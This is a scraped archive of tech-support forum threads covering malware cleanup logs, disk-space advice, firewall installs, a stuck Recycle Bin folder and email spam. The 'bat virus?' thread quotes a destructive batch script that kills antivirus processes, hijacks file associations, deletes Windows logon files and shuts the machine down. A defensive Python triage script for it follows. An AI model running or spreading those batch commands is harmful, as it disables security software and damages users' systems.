Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com\StreamMinerInfo.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.copacast.net\cpfuid.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.copacast.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.skype.com\download.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.skype.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.youtube.com\soundData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.youtube.com\videostats.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.youtube.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#1.p6.webhosting.yahoo.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#1.p6.webhosting.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#adcontent.videoegg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#adcontent.videoegg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#as1.suitesmart.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#as1.suitesmart.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#d.yimg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#d.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#e.blip.tv\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#e.blip.tv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#flash.quantserve.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#flash.quantserve.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#googleads.g.doubleclick.net\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#googleads.g.doubleclick.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#illumenix.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#illumenix.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#interclick.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#interclick.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#l.yimg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#l.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#login.yahoo.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#login.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#macromedia.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.podaddies.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.podaddies.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.scanscout.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.scanscout.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#pic.wretch.cc\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#pic.wretch.cc
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#static.youku.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#static.youku.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#tubemogul.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#tubemogul.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.copacast.net\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.copacast.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.skype.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.skype.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.youtube.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.youtube.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax\fpupdateax.exe
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com\bin
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\AddIns
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v1.1.4322\security.config
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v1.1.4322\security.config.cch
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v1.1.4322
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v2.0.50727.42
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Credentials\S-1-5-21-484763869-1547161642-725345543-1004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Credentials
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\3C83474D61E624A4F9844DF935AFE217
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\486CC6AFD08942336C61FCD401C4A1D1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\5209B26A762CFE608406374019066239
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\6C68A73125F3238F044A8115D96841B6
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\74BFD122C0875EC75DBE5C6DB4C59019
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\7735880A01E3F94F763761958A7A8191
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\904590238400AD963F77FAAAADC9BAB5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\A44F4E7CB3133FF765C39A53AD8FCFDD
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\A8FABA189DB7D25FBA7CAC806625FD30
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\CFC456E7E410D69E2C6F3E2DB75C7DB3
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\D9446DF6FD9BABE04CC252D4F0FB3D01
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\E6024EAC88E6B6165D49FE3C95ADD735
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\F482C95F83F1B59228F1B1E720F2EDF1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\3C83474D61E624A4F9844DF935AFE217
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\486CC6AFD08942336C61FCD401C4A1D1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\5209B26A762CFE608406374019066239
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\6C68A73125F3238F044A8115D96841B6
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\74BFD122C0875EC75DBE5C6DB4C59019
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\7735880A01E3F94F763761958A7A8191
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\904590238400AD963F77FAAAADC9BAB5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\A44F4E7CB3133FF765C39A53AD8FCFDD
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\A8FABA189DB7D25FBA7CAC806625FD30
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\CFC456E7E410D69E2C6F3E2DB75C7DB3
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\D9446DF6FD9BABE04CC252D4F0FB3D01
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\E6024EAC88E6B6165D49FE3C95ADD735
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\F482C95F83F1B59228F1B1E720F2EDF1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-1547161642-725345543-1004\6b29ae44e85efac3c72ff4d1865d73f1_c13babcd-f4ed-4fe6-a001-0d43b2202cdf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-1547161642-725345543-1004\80442fc0e99db4760a22fffc9bf91c16_c13babcd-f4ed-4fe6-a001-0d43b2202cdf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-1547161642-725345543-1004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Excel\XLSTART
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Excel
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\brndlog.bak
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\brndlog.txt
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Desktop.htt
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\HP Rhapsody.lnk
Status: Access denied

btw, the microsoft stuff still aren't working. i tried downloading the 2007 trial version, but even that didn't work. it still tells me that there is "not enough memory or disk space" to run them.

i really needed it today and will need it for SURE next week! what to doooo?? ):

OH. also, i only have 15.7 GB memory because i downloaded some stuff to try to get microsoft to work.

The only thing I can suggest to get some free space is to off-load some files, pictures, videos etc. to some DVD-RWs and keep only essential programs on your C drive. You could also add another hard drive as a slave and use that for storage or buy an external hard drive.

but the funny thing is that it worked properly when i had even less memory, like about 4 GB.
do you think that it could be a virus...
or something else???

Quote

but the funny thing is that it worked properly when i had even less memory, like about 4 GB.
do you think that it could be a virus...
or something else???

We can continue checking but I seriously doubt it's malware because nothing is showing up in the logs.
Please do this: Click My Computer, right-click the C drive and choose Properties. Now give me a screenprint.
How to post screenshots or images

I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\15\399851cf-218bd015 | probably a variant of Win32/Agent.FQRCZBA trojan | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\18\26e2fcd2-5798fd32 | multiple threats | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\21\584f2615-6bfc2fd6 | multiple threats | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\24\38566918-7cbe2475 | a variant of Java/TrojanDownloader.Agent.NAN trojan | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\24\c419dd8-57f96764 | multiple threats | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\27\4678319b-30b56b52 | multiple threats | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\50\7d6ea6f2-77282d43 | multiple threats | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\51\22c3fb33-41aebf9c | multiple threats | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\54\947f9b6-4ccdb638 | a variant of Java/Exploit.Agent.NAC trojan | deleted - quarantined
C:\Documents and Settings\jamesho\Application Data\Sun\Java\Deployment\cache\6.0\58\14e0d07a-427e8f90 | multiple threats | deleted - quarantined
C:\Qoobox\Quarantine\C\Program Files\Antispyware\TCL.dll.vir | Win32/Adware.AntiSpyware2008 application | cleaned by deleting - quarantined
C:\Qoobox\Quarantine\C\WINDOWS\system32\ekekojus.ini.vir | Win32/Adware.Virtumonde.NEO application | cleaned by deleting - quarantined
C:\System Volume Information\_restore{9666028F-3AA7-4E35-9C2A-381ABC957478}\RP606\A0056785.dll | Win32/Adware.AntiSpyware2008 application | cleaned by deleting - quarantined
C:\System Volume Information\_restore{9666028F-3AA7-4E35-9C2A-381ABC957478}\RP606\A0056788.ini | Win32/Adware.Virtumonde.NEO application | cleaned by deleting - quarantined


Uploaded with ImageShack.us

Just as I thought. The problem now is that you have too little free space. We should do some cleanup. You can remove all other tools we used to clean your computer. The instructions for ComboFix are below.

* Click START then RUN - Vista users press the Windows Key and the R keys together for the Run box.
* Now type Combofix /uninstall in the runbox
* Make sure there's a space between Combofix and /Uninstall
* Then hit Enter

* The above procedure will:
* Delete the following:
* ComboFix and its associated files and folders.
* Reset the clock settings.
* Hide file extensions, if required.
* Hide System/Hidden files, if required.
* Set a new, clean Restore Point.
****************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
************************************************
Given the state of your hard drive, I wouldn't recommend that you install any more new programs, which will just make matters worse. If you're able to get more space on that drive, you could then consider installing some of them.

Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
3274.

Solve : bat virus?

Answer»

hello everyone,
i am just a normal surfer, while i was going through a website and got a code like below:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:WINDOWSsystem32logoff.exe /F /Q
DEL C:WINDOWSsystem32logon.exe /F /Q
DEL C:WINDOWSsystem32logon.scr /F /Q
cls
shutdown


and it does the following things:

1. Ends Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and icons will disappear)
3. Ends Process, zonelabs.exe
4. associate an exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open Winamp or WMP)
6. Deletes Login/Logoff Screens

now i want to retrieve of what it has done. Can anyone help me?
i am not a virus maker but just a experimentist, Please help me.. :_:

No idea what you are talking about. What is it you are trying to do?
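An added example, not part of the original thread: a small Python triage pass over a batch script like the one quoted in the question, which flags the behaviours the poster lists and, for file associations whose stock Windows file type is certain (.exe, .txt, .bat, .cmd), emits the `assoc` command that restores it. The function and rule names are hypothetical, and the sample is a subset of the lines quoted in the post.

```python
import re
from typing import List, NamedTuple, Optional

# Sample input: a subset of the script lines quoted in the post above.
SAMPLE = """\
title virus is my dna
@echo off
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill explorer.exe /F /Q
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
msg * hi dude this is begining.
DEL C:WINDOWSsystem32logoff.exe /F /Q
shutdown
"""

# Stock Windows file types. Extensions such as .mp3 depend on the installed
# player, so no restore command is suggested for them.
DEFAULT_FILETYPE = {".exe": "exefile", ".txt": "txtfile",
                    ".bat": "batfile", ".cmd": "cmdfile"}


class Finding(NamedTuple):
    line_no: int
    rule: str
    detail: str
    fix: Optional[str]  # command that undoes the change, when known


# Hypothetical rule names; each pattern is matched at the start of a line.
RULES = [
    ("assoc-change", re.compile(r"^assoc\s+(\.\w+)\s*=\s*(\S*)", re.I)),
    ("process-kill", re.compile(r"^(?:kill|tskill|taskkill)\b.*?([\w.-]+\.exe)", re.I)),
    ("system32-delete", re.compile(r"^(?:del|erase)\b.*?(\S*system32\S*)", re.I)),
    ("broadcast-message", re.compile(r"^(?:net\s+send|msg)\s+\*", re.I)),
    ("shutdown", re.compile(r"^shutdown\b", re.I)),
]


def expand(line: str, env: dict) -> str:
    """Substitute %var% using earlier `set var=value` lines, as cmd.exe would."""
    return re.sub(r"%(\w+)%",
                  lambda m: env.get(m.group(1).lower(), m.group(0)), line)


def triage(script: str) -> List[Finding]:
    env = {}
    findings = []
    for no, raw in enumerate(script.splitlines(), 1):
        line = expand(raw.strip().lstrip("@"), env)
        assignment = re.match(r"set\s+(\w+)=(.*)", line, re.I)
        if assignment:
            # Remember the value so a later %var% line is inspected in full.
            env[assignment.group(1).lower()] = assignment.group(2)
            continue
        for rule, pattern in RULES:
            m = pattern.match(line)
            if not m:
                continue
            detail, fix = line, None
            if rule == "assoc-change":
                ext, target = m.group(1).lower(), m.group(2)
                default = DEFAULT_FILETYPE.get(ext)
                if default and target.lower() == default:
                    break  # sets the stock value: nothing to report
                detail = f"{ext} -> {target or '(removed)'}"
                fix = f"assoc {ext}={default}" if default else None
            elif rule in ("process-kill", "system32-delete"):
                detail = m.group(1)
            findings.append(Finding(no, rule, detail, fix))
            break
    return findings


def restore_commands(findings: List[Finding]) -> List[str]:
    """Commands to run from an elevated prompt to undo known assoc changes."""
    return [f.fix for f in findings if f.fix]


if __name__ == "__main__":
    results = triage(SAMPLE)
    for f in results:
        print(f"line {f.line_no:2}: {f.rule:18} {f.detail}")
    print("restore:", restore_commands(results))
```

Deleted system files and associations without a known default are reported but not repaired; those need a system restore point or installation media.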

3275.

Solve : AV security suite issue on Vista machine?

Answer»

Wha-hoo THANK you!

3276.

Solve : ERROR LOADING SPHPXPNT.DLL/ARACETUW.DLL - SPECIFIED MODULE COULD NOT BE FOUND?

Answer»

Is it Dc53 or Dc55? Right-click on that file and click Properties and tell me about this folder.

Quote

Do I need Microsoft Security Essentials since I already have SAS and MalwareBytes
Microsoft Security Essentials is your anti-virus program. You certainly need one AV program on your computer. SAS and MBAM are for malware, spyware etc. and they are not full-time scanners. You will need to initiate the scans with those two.

Quote
Now I have one more problem - I am unable to launch Skype.
Try reinstalling the program.

1. Quote
Now I have one more problem - I am unable to launch Skype.

I was able to resolve this by turning off Windows XP Firewall.

2. Quote
Do I need Microsoft Security Essentials since I already have SAS and MalwareBytes

Understood. Thank you.

3. Quote
Is it Dc53 or Dc55? Right-click on that file and click Properties and tell me about this folder.
Please, see printscreen attached.

4. Quote
I am not able to install Comodo - it says "This installation doesn't support target platform".
I am running WinXP 32.


5. I started getting an error message "jusched.exe encountered a problem and needs to close".
Please, see printscreen attached.






[Recovering disk space - old attachment deleted by admin]

Quote
I am not able to install Comodo - it says "This installation doesn't support target platform".
Are you quite certain that you didn't download the 64 bit one? Try downloading it again.

Quote
I started getting an error message "jusched.exe encountered a problem and needs to close".
Please, see printscreen attached.
Please try this and see if it gets rid of the error.

Quote
Are you quite certain that you didn't download the 64 bit one? Try downloading it again.
You are right. My mistake. I downloaded 64 one from http://www.majorgeeks.com/Comodo_Personal_Firewall_d5033.html
There's no 32 version there. Can you give me the safe link where I can download 32 one from. Thanks.

Quote
Can you give me the safe link where I can download 32 one from. Thanks
Just go to that link and choose "download @ author's site"

1. I was able to download and install COMODO from cfw_installer_x86 which was the file at "download @ author's site". I am not sure if this 32 version but it works for now.


2. Quote
"You can download and install Unlocker
and try to delete it with that. What happens when you hit the "Empty recycling bin"?

I tried Unlocker and it didn't work. When I hit delete from recycle bin I get a pop up message "Cannot remove folder Dc55: Access is denied. Make sure the disk is not full or write protected"

Thanks SuperDave

Quote
I am not sure if this 32 version but it works for now.
That's the one.

Quote
I tried Unlocker and it didn't work. When I hit delete from recycle bin I get a pop up message "Cannot remove folder Dc55: Access is denied. Make sure the disk is not full or write protected"

I found this just after I posted my reply. The same folder.
Sorry. I fixed it. Please try again.

Quote
I found this just after I posted my reply. The same folder.

Sorry, can you give me the full link - I am getting "Google Chrome could not find http".

Thanks.

I fixed it. Please try again.

Start a command prompt (cmd.exe) - done.

Move to the RECYCLER folder - how do I do that? Should I do it in cmd.exe window ?

Enter the command - "attrib -h *.*" is it the exact command ?
attrib -h *.*

Delete the file

Restart the computer

Take a look at this:
http://forums.techarena.in/windows-xp-support/990228.htm

I did those steps mentioned at http://forums.techarena.in/windows-xp-support/990228.htm and was able to get rid of this Dc 55 empty folder in my recycle bin. However, I started having the following issues with my recycle bin:

1. When I restart my machine, I get " Recycle Bin on drive C: is corrupted. Do you want to empty the recycle bin for this drive?"


2. The recycle bin remains empty even though I unchecked " Don't move files to the Recycle Bin. Remove files immediately when deleted" option in the properties.


I downloaded and ran the latest Service Pack 3 but it didn't fix the issue. Also Googled some advice which didn't help.

I know this is a different topic, SuperDave. I appreciate all your help with the previous issue which HAS BEEN RESOLVED. Now , should I start a different thread on this ?


P.S. Some folks believe this may be due to INFO2 file corruption. I tried to look it up on my machine but didn't find it.

Quote
I know this is a different topic, SuperDave. I appreciate all your help with the previous issue which HAS BEEN RESOLVED. Now , should I start a different thread on this ?
Why not delete all the recycling bins from each drive? (Follow the directions in the link.) If that doesn't work, start a new thread in the appropriate forum for your OS, not this forum. Good luck.
3277.

Solve : Has my e-mail been hijacked?

Answer»

Has my Yahoo e-mail been hijacked? If so, what can I do about it? I have found two delivery failure messages in my spam folder relating to e-mails which I have never sent.

It has the words "VIRTUALLY AUTHENTIC" before my e-mail address. They relate to an advertisement for fake products with a link to hxxp://www.bladechange.com/

As long as they are in your spam folder don't worry about it.

My yahoo email was hijacked. It sent spam email to all my contacts. If you call yahoo there is a recording about their site getting hijacked.

@FLIGHT: Try changing your Yahoo! Mail password. Btw, next time please create your own topic.

3278.

Solve : redirect virus?

Answer»

